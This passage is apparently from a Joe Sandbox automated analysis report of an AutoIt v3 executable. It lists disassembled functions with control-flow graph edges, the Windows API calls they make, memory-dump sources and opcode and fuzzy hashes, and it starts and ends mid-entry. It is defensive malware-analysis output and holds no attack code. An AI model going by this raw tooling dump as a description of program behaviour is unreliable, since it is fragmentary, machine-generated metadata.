                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: D5$$D5$$D5$$D5$$D5$D5$$Variable must be of type 'Object'.
                                                                                                    • API String ID: 0-3565641341
                                                                                                    • Opcode ID: 9206ac18e26757af5d808a64ab4bda9d9fc48430c428f74abbd09569fec70023
                                                                                                    • Instruction ID: 0aefba1ed7a983f28d77d18fe56ad5a6c3fdde1220b683af50d3e6bea4f38c54
                                                                                                    • Opcode Fuzzy Hash: 9206ac18e26757af5d808a64ab4bda9d9fc48430c428f74abbd09569fec70023
                                                                                                    • Instruction Fuzzy Hash: A8C28975A00205DFCB24CF98C884BAEB7B1BF19310F25816DE959AB361D771ED82CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001802F0 Relevance: 15.2, APIs: 3, Strings: 5, Instructions: 1236COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __Init_thread_footer.LIBCMT ref: 001815A2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Init_thread_footer
                                                                                                    • String ID: D5$$D5$$D5$$D5$$D5$D5$
                                                                                                    • API String ID: 1385522511-2819346438
                                                                                                    • Opcode ID: d46ae72c85fa403912c87d52a5bb3949ab4ce935c933e03029aec2583f0ae973
                                                                                                    • Instruction ID: c56c999746acb3c8d5c0158ef10c2257b404eef64c8b7aa7010c62a9143c6e57
                                                                                                    • Opcode Fuzzy Hash: d46ae72c85fa403912c87d52a5bb3949ab4ce935c933e03029aec2583f0ae973
                                                                                                    • Instruction Fuzzy Hash: EFB2AB75A08300CFDB69EF18C480A2AB7E1BF99310F25895DE9858B351D771EE85CF92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00172A52 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 2094 172a52-172a8b 2095 172a91-172aa7 mciSendStringW 2094->2095 2096 1b39f4-1b39f5 DestroyWindow 2094->2096 2097 172aad-172ab5 2095->2097 2098 172d08-172d15 2095->2098 2099 1b3a00-1b3a0d 2096->2099 2097->2099 2100 172abb-172aca call 172e70 2097->2100 2101 172d17-172d32 UnregisterHotKey 2098->2101 2102 172d3a-172d41 2098->2102 2104 1b3a0f-1b3a12 2099->2104 2105 1b3a3c-1b3a43 2099->2105 2115 1b3a4a-1b3a56 2100->2115 2116 172ad0-172ad8 2100->2116 2101->2102 2107 172d34-172d35 call 172712 2101->2107 2102->2097 2103 172d47 2102->2103 2103->2098 2110 1b3a1e-1b3a21 FindClose 2104->2110 2111 1b3a14-1b3a1c call 177953 2104->2111 2105->2099 2109 1b3a45 2105->2109 2107->2102 2109->2115 2114 1b3a27-1b3a34 2110->2114 2111->2114 2114->2105 2117 1b3a36-1b3a37 call 1e3c0b 2114->2117 2120 1b3a58-1b3a5a FreeLibrary 2115->2120 2121 1b3a60-1b3a67 2115->2121 2118 1b3a6e-1b3a7b 2116->2118 2119 172ade-172b03 call 17e650 2116->2119 2117->2105 2126 1b3a7d-1b3a9a VirtualFree 2118->2126 2127 1b3aa2-1b3aa9 2118->2127 2131 172b05 2119->2131 2132 172b3a-172b45 OleUninitialize 2119->2132 2120->2121 2121->2115 2125 1b3a69 2121->2125 2125->2118 2126->2127 2129 1b3a9c-1b3a9d call 1e3c71 2126->2129 2127->2118 2130 1b3aab 2127->2130 2129->2127 2134 1b3ab0-1b3ab4 2130->2134 2135 172b08-172b38 call 173047 call 172ff0 2131->2135 2132->2134 2136 172b4b-172b50 2132->2136 2134->2136 2137 1b3aba-1b3ac0 2134->2137 2135->2132 2139 172b56-172b60 2136->2139 2140 1b3ac5-1b3ad2 call 1e3c45 2136->2140 2137->2136 2143 172b66-172b71 call 17bd2c 2139->2143 2144 172d49-172d56 call 18fb27 2139->2144 2152 1b3ad4 2140->2152 2155 172b77 call 172f86 2143->2155 2144->2143 2154 172d5c 2144->2154 2157 1b3ad9-1b3afb call 19015d 2152->2157 2154->2144 2156 172b7c-172be7 call 172e17 call 1901a4 call 172dbe call 17bd2c call 17e650 call 172e40 call 1901a4 2155->2156 2156->2157 2184 172bed-172c11 call 1901a4 2156->2184 2163 1b3afd 2157->2163 2166 1b3b02-1b3b24 call 19015d 2163->2166 2171 1b3b26 2166->2171 2174 1b3b2b-1b3b4d call 19015d 2171->2174 2180 1b3b4f 2174->2180 2183 1b3b54-1b3b61 call 1d6d63 2180->2183 2190 1b3b63 2183->2190 2184->2166 2189 172c17-172c3b call 1901a4 2184->2189 2189->2174 2194 172c41-172c5b call 1901a4 2189->2194 2193 1b3b68-1b3b75 call 18bd6a 2190->2193 2198 1b3b77 2193->2198 2194->2183 2200 172c61-172c85 call 172e17 call 1901a4 2194->2200 2201 1b3b7c-1b3b89 call 1e3b9f 2198->2201 2200->2193 2209 172c8b-172c93 2200->2209 2207 1b3b8b 2201->2207 2210 1b3b90-1b3b9d call 1e3c26 2207->2210 2209->2201 2211 172c99-172caa call 17bd2c call 172f4c 2209->2211 2217 1b3b9f 2210->2217 2218 172caf-172cb7 2211->2218 2220 1b3ba4-1b3bb1 call 1e3c26 2217->2220 2218->2210 2219 172cbd-172ccb 2218->2219 2219->2220 2221 172cd1-172d07 call 17bd2c * 3 call 172eb8 2219->2221 2225 1b3bb3 2220->2225 2225->2225
                                                                                                    APIs
                                                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00172A9B
                                                                                                    • OleUninitialize.OLE32(?,00000000), ref: 00172B3A
                                                                                                    • UnregisterHotKey.USER32(?), ref: 00172D1F
                                                                                                    • DestroyWindow.USER32(?), ref: 001B39F5
                                                                                                    • FreeLibrary.KERNEL32(?), ref: 001B3A5A
                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 001B3A87
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                    • String ID: close all
                                                                                                    • API String ID: 469580280-3243417748
                                                                                                    • Opcode ID: 645bc2705f911f438fd957e972b8c59215f840c8fa0daad2ba19541fc29c82fa
                                                                                                    • Instruction ID: fa8bf4482e234e1198acc69e9a1b3c6ac7d74f784e327c8abb92f3815a149d1a
                                                                                                    • Opcode Fuzzy Hash: 645bc2705f911f438fd957e972b8c59215f840c8fa0daad2ba19541fc29c82fa
                                                                                                    • Instruction Fuzzy Hash: FFD13C317012128FCB29EF65C599B69F7B4BF15710F2581ADE85AAB252CB31ED22CF40
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001E874A Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 2233 1e874a-1e878c call 1b22f0 call 178e70 2238 1e878e-1e879c call 17c92d 2233->2238 2239 1e87a2 2233->2239 2238->2239 2245 1e879e-1e87a0 2238->2245 2241 1e87a4-1e87b0 2239->2241 2243 1e886d-1e891f call 178e70 call 17557e call 19d913 call 1993c8 * 2 GetCurrentDirectoryW SetCurrentDirectoryW 2241->2243 2244 1e87b6 2241->2244 2278 1e8973-1e8984 call 17e650 2243->2278 2279 1e8921-1e892d call 1de387 2243->2279 2247 1e87ba-1e87c0 2244->2247 2245->2241 2249 1e87ca-1e87cf 2247->2249 2250 1e87c2-1e87c8 2247->2250 2253 1e87d9-1e87df 2249->2253 2254 1e87d1-1e87d4 2249->2254 2252 1e87d6 2250->2252 2252->2253 2256 1e8848-1e884a 2253->2256 2257 1e87e1-1e87e4 2253->2257 2254->2252 2258 1e884b-1e884e 2256->2258 2257->2256 2260 1e87e6-1e87e9 2257->2260 2261 1e8858 2258->2261 2262 1e8850-1e8856 2258->2262 2264 1e87eb-1e87ee 2260->2264 2265 1e8844-1e8846 2260->2265 2268 1e885c-1e8867 2261->2268 2262->2268 2264->2265 2266 1e87f0-1e87f3 2264->2266 2267 1e883d-1e883e 2265->2267 2270 1e87f5-1e87f8 2266->2270 2271 1e8840-1e8842 2266->2271 2267->2258 2268->2243 2268->2247 2270->2271 2273 1e87fa-1e87fd 2270->2273 2271->2267 2276 1e87ff-1e8802 2273->2276 2277 1e883b 2273->2277 2276->2277 2280 1e8804-1e8807 2276->2280 2277->2267 2291 1e8987-1e898b call 17bd2c 2278->2291 2279->2278 2288 1e892f-1e893a call 1de9c5 2279->2288 2282 1e8809-1e880c 2280->2282 2283 1e8834-1e8839 2280->2283 2282->2283 2286 1e880e-1e8811 2282->2286 2283->2258 2289 1e882d-1e8832 2286->2289 2290 1e8813-1e8816 2286->2290 2299 1e89cf 2288->2299 2300 1e8940-1e8967 GetFileAttributesW SetFileAttributesW 2288->2300 2289->2258 2290->2289 2293 1e8818-1e881b 2290->2293 2298 1e8990-1e8998 2291->2298 2296 1e881d-1e8820 2293->2296 2297 1e8826-1e882b 2293->2297 2296->2297 2301 1e899b-1e89af call 17e650 2296->2301 2297->2258 2303 1e89d3-1e89ec call 1e9f9f 2299->2303 2304 1e8969-1e8971 SetCurrentDirectoryW 2300->2304 2305 1e89b1-1e89b3 2300->2305 2301->2298 2308 1e8a02-1e8a0c SetCurrentDirectoryW 2303->2308 2313 1e89ee-1e89fb call 17e650 2303->2313 2304->2278 2307 1e89b5-1e89cd SetCurrentDirectoryW call 194d13 2305->2307 2305->2308 2307->2303 2308->2291 2313->2308
                                                                                                    APIs
                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 001E8907
                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?), ref: 001E891B
                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 001E8945
                                                                                                    • SetFileAttributesW.KERNELBASE(?,00000000), ref: 001E895F
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 001E8971
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 001E89BA
                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,?), ref: 001E8A0A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentDirectory$AttributesFile
                                                                                                    • String ID: *.*
                                                                                                    • API String ID: 769691225-438819550
                                                                                                    • Opcode ID: d37636dc8fe087a5dec67326a73fec1f019ccc73d9d10a2f3ebdedbc2b431476
                                                                                                    • Instruction ID: 01a87b0c62889b8330254502bc7ca3712a46db4674691341adbe7cd6971d1de0
                                                                                                    • Opcode Fuzzy Hash: d37636dc8fe087a5dec67326a73fec1f019ccc73d9d10a2f3ebdedbc2b431476
                                                                                                    • Instruction Fuzzy Hash: A281D2729047809FCB24EF66C484AAEB3E9BF94310F54881EF88DD7251EB34D945CB92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001A90D5 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 2316 1a90d5-1a90e5 2317 1a90ff-1a9101 2316->2317 2318 1a90e7-1a90fa call 19f656 call 19f669 2316->2318 2319 1a9469-1a9476 call 19f656 call 19f669 2317->2319 2320 1a9107-1a910d 2317->2320 2336 1a9481 2318->2336 2337 1a947c call 1a2b7c 2319->2337 2320->2319 2322 1a9113-1a913e 2320->2322 2322->2319 2325 1a9144-1a914d 2322->2325 2328 1a914f-1a9162 call 19f656 call 19f669 2325->2328 2329 1a9167-1a9169 2325->2329 2328->2337 2334 1a916f-1a9173 2329->2334 2335 1a9465-1a9467 2329->2335 2334->2335 2340 1a9179-1a917d 2334->2340 2338 1a9484-1a9489 2335->2338 2336->2338 2337->2336 2340->2328 2343 1a917f-1a9196 2340->2343 2345 1a9198-1a919b 2343->2345 2346 1a91b3-1a91bc 2343->2346 2349 1a919d-1a91a3 2345->2349 2350 1a91a5-1a91ae 2345->2350 2347 1a91da-1a91e4 2346->2347 2348 1a91be-1a91d5 call 19f656 call 19f669 call 1a2b7c 2346->2348 2352 1a91eb-1a9209 call 1a3bb0 call 1a2d58 * 2 2347->2352 2353 1a91e6-1a91e8 2347->2353 2379 1a939c 2348->2379 2349->2348 2349->2350 2354 1a924f-1a9269 2350->2354 2383 1a920b-1a9221 call 19f669 call 19f656 2352->2383 2384 1a9226-1a924c call 1a97b4 2352->2384 2353->2352 2356 1a926f-1a927f 2354->2356 2357 1a933d-1a9346 call 1afc3b 2354->2357 2356->2357 2361 1a9285-1a9287 2356->2361 2368 1a9348-1a935a 2357->2368 2369 1a93b9 2357->2369 2361->2357 2365 1a928d-1a92b3 2361->2365 2365->2357 2370 1a92b9-1a92cc 2365->2370 2368->2369 2374 1a935c-1a936b GetConsoleMode 2368->2374 2372 1a93bd-1a93d5 ReadFile 2369->2372 2370->2357 2375 1a92ce-1a92d0 2370->2375 2377 1a9431-1a943c GetLastError 2372->2377 2378 1a93d7-1a93dd 2372->2378 2374->2369 2380 1a936d-1a9371 2374->2380 2375->2357 2381 1a92d2-1a92fd 2375->2381 2385 1a943e-1a9450 call 19f669 call 19f656 2377->2385 2386 1a9455-1a9458 2377->2386 2378->2377 2387 1a93df 2378->2387 2389 1a939f-1a93a9 call 1a2d58 2379->2389 2380->2372 2388 1a9373-1a938d ReadConsoleW 2380->2388 2381->2357 2390 1a92ff-1a9312 2381->2390 2383->2379 2384->2354 2385->2379 2398 1a945e-1a9460 2386->2398 2399 1a9395-1a939b call 19f633 2386->2399 2395 1a93e2-1a93f4 2387->2395 2396 1a93ae-1a93b7 2388->2396 2397 1a938f GetLastError 2388->2397 2389->2338 2390->2357 2391 1a9314-1a9316 2390->2391 2391->2357 2402 1a9318-1a9338 2391->2402 2395->2389 2406 1a93f6-1a93fa 2395->2406 2396->2395 2397->2399 2398->2389 2399->2379 2402->2357 2410 1a93fc-1a940c call 1a8df1 2406->2410 2411 1a9413-1a941e 2406->2411 2422 1a940f-1a9411 2410->2422 2416 1a942a-1a942f call 1a8c31 2411->2416 2417 1a9420 call 1a8f41 2411->2417 2423 1a9425-1a9428 2416->2423 2417->2423 2422->2389 2423->2422
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6e615818a0636188e8ed546e7e3d589af50c2ea4ffa42a7e9a511d270722e107
                                                                                                    • Instruction ID: 01338de98bd5159cb2cdd6c36b39f6bf857e8b0ba8481396e629df005e1e53ff
                                                                                                    • Opcode Fuzzy Hash: 6e615818a0636188e8ed546e7e3d589af50c2ea4ffa42a7e9a511d270722e107
                                                                                                    • Instruction Fuzzy Hash: C8C1D2B8E04349AFDF11DFA8D845BADBBB4BF1B310F144199E914A7392C7349982CB61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00172735 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 153comCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 00173205: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00173236
                                                                                                      • Part of subcall function 00173205: MapVirtualKeyW.USER32(00000010,00000000), ref: 0017323E
                                                                                                      • Part of subcall function 00173205: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00173249
                                                                                                      • Part of subcall function 00173205: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00173254
                                                                                                      • Part of subcall function 00173205: MapVirtualKeyW.USER32(00000011,00000000), ref: 0017325C
                                                                                                      • Part of subcall function 00173205: MapVirtualKeyW.USER32(00000012,00000000), ref: 00173264
                                                                                                      • Part of subcall function 0017318C: RegisterWindowMessageW.USER32(00000004,?,00172906), ref: 001731E4
                                                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 001729AC
                                                                                                    • OleInitialize.OLE32 ref: 001729CA
                                                                                                    • CloseHandle.KERNEL32(00000000,00000000), ref: 001B39E7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                    • String ID: (&$$0$$$@($$$$
                                                                                                    • API String ID: 1986988660-1124607636
                                                                                                    • Opcode ID: e696c5015be30c1614cd73be0c6fdc81f425128af92853c6c1f112f61d6b2c85
                                                                                                    • Instruction ID: 42f84d808c21775b98b632eb2e953b999bea91aa645731cbd743a5dfb672f825
                                                                                                    • Opcode Fuzzy Hash: e696c5015be30c1614cd73be0c6fdc81f425128af92853c6c1f112f61d6b2c85
                                                                                                    • Instruction Fuzzy Hash: 5E7169B8921244CEC388EF6BBD6D6193AF5FB5A3047D0812AF519C72A2EB70445DCF64
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0017353A Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 2467 17353a-1735aa CreateWindowExW * 2 ShowWindow * 2
                                                                                                    APIs
                                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00173568
                                                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00173589
                                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,001732EF,?), ref: 0017359D
                                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,001732EF,?), ref: 001735A6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$CreateShow
                                                                                                    • String ID: AutoIt v3$edit
                                                                                                    • API String ID: 1584632944-3779509399
                                                                                                    • Opcode ID: e1f0d94bf3e55f10cf5a8e8541f61fc55e3c4100c366ee8599de2c34aa28b7c1
                                                                                                    • Instruction ID: da0d61bf95f35b76be75021da520beaf99b052c533f0920c920197af56395d67
                                                                                                    • Opcode Fuzzy Hash: e1f0d94bf3e55f10cf5a8e8541f61fc55e3c4100c366ee8599de2c34aa28b7c1
                                                                                                    • Instruction Fuzzy Hash: 65F03A78600394BAE7310B537C0CF372EBDDBC7F50B40005EB904A71A0C2691899DAB0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001755F8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,001755EB,SwapMouseButtons,00000004,?), ref: 0017561C
                                                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,001755EB,SwapMouseButtons,00000004,?), ref: 0017563D
                                                                                                    • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,001755EB,SwapMouseButtons,00000004,?), ref: 0017565F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                    • String ID: Control Panel\Mouse
                                                                                                    • API String ID: 3677997916-824357125
                                                                                                    • Opcode ID: 874911dec09df82e581f0019f0f253af2803cb218453ab0d66f3a57f1039db15
                                                                                                    • Instruction ID: 3340f18894c7c6c457062ad94c6b2b9631d96c67e065db00f1dd8c4bb1dd3acb
                                                                                                    • Opcode Fuzzy Hash: 874911dec09df82e581f0019f0f253af2803cb218453ab0d66f3a57f1039db15
                                                                                                    • Instruction Fuzzy Hash: 8B113C75611608FFEB208FA4DC44EAF77B9EF14744F508469F809D7120E7B19E419760
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001DDA81 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetFileAttributesW.KERNELBASE(?,0020DC30), ref: 001DDABB
                                                                                                    • GetLastError.KERNEL32 ref: 001DDACA
                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000), ref: 001DDAD9
                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0020DC30), ref: 001DDB36
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 2267087916-0
                                                                                                    • Opcode ID: c0ff3cbcdf4cc6e3aeecb7c3143d2c6655f2eb67311739c54b304d3fde82820e
                                                                                                    • Instruction ID: a534444521259539d648b9f889fc9548860cb9a66b2cd1120135aa2916079948
                                                                                                    • Opcode Fuzzy Hash: c0ff3cbcdf4cc6e3aeecb7c3143d2c6655f2eb67311739c54b304d3fde82820e
                                                                                                    • Instruction Fuzzy Hash: F0219F305093019FC710DF64E8859AAB7E4EE66368F544A1FF8A9833A2D730D94ACB42
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00173A1C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetOpenFileNameW.COMDLG32(?), ref: 001B4115
                                                                                                      • Part of subcall function 0017557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00175558,?,?,001B4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0017559E
                                                                                                      • Part of subcall function 001739DE: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001739FD
                                                                                                    Strings
                                                                                                    Memory Dump Source
